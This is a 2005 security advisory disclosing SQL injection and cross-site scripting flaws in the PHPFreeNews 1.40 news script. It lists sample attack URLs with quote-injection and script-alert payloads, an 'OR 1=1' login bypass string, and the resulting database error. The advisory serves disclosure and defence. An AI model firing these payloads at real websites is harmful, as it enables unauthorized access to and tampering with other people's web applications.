phpfreenews140.txt

2005-08-18T00:00:00
ID PACKETSTORM:39461
Type packetstorm
Reporter matrix killer
Modified 2005-08-18T00:00:00

Description

                                        
                                            `PHPFreeNews V1.40 and prior Multiple Vulnerabilities  
  
SEVERITY:  
=========  
High  
  
SOFTWARE:  
=========  
PHPFreeNews  
http://www.phpfreenews.co.uk/  
  
INFO:  
=====  
PHPFreeNews is a free PHP Script which allows you to display news  
headlines and articles on your website.  
  
DESCRIPTION:  
============  
PHPFreeNews Version V1.40 and earlier are vulnerable to various SQL  
Injection and XSS attacks. Here are some examples:  
  
  
--==-- SQL Injection --==--  
  
  
http://www.site.com/phpfn/SearchResults.php?Match='&NewsMode=1&SearchNews=Search&CatID=0  
  
http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='  
  
http://www.site.com/phpfn/SearchResults.php?Match=%27&NewsMode=1&SearchNews=Search&CatID=0  
  
http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=%27  
  
Warning: mysql_num_rows(): supplied argument is not a valid MySQL  
result resource in \somepath\www\phpfn\Inc\ListingFunctions.php on  
line 92  
Query failed : You have an error in your SQL syntax. Check the manual  
that corresponds to your MySQL server version for the right syntax to  
use near '''' IN BOOLEAN MODE) ORDER BY Sticky DESC, Priority,  
PostDate  
  
  
Also http://www.site.com/phpfn/Inc/AccessControl.php type for user and  
pass some sql injection string like "OR" 1=1 and you will get an  
error.  
  
  
  
--==-- XSS --==--  
  
http://www.site.com/phpfn/NewsCategoryForm.php?NewsMode="><script>alert('Found  
By Matrix_Killer');</script>&CatID=0  
  
http://www.site.com/phpfn/SearchResults.php?Match='><script>alert('Matrix_Killer  
OwnZ The World :)');</script>&NewsMode=1&SearchNews=Search&CatID=0  
  
http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='><script>alert('Hell  
Year');</script>  
  
http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode="><script>alert('0_o  
Please StoP !');</script>&SearchNews=Search&CatID=0  
  
http://www.site.com/phpfn/SearchResults.php?Match="><script>alert('Matrix_Killer  
-> The bug Hunter <-');</script>&NewsMode=1&SearchNews=Search&CatID=0  
  
  
VENDOR STATUS  
=============  
  
Vendor contacted on the 17th of August.  
  
Vendor Reply (17th of August) - All the bugs have been fixed and will  
be included in the next release.  
  
CREDITS:   
========   
  
This vulnerability was discovered and researched by -  
  
matrix_killer of h4cky0u Security Forums.   
  
  
mail : matrix_k at abv.bg  
  
web : http://www.h4cky0u.org  
  
  
Co-Researcher -  
  
h4cky0u of the h4cky0u Security Forums.  
  
mail : h4cky0u@gmail.com  
  
web : http://www.h4cky0u.org  
  
  
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!  
  
--   
http://www.h4cky0u.org  
(In)Security at its best...  
`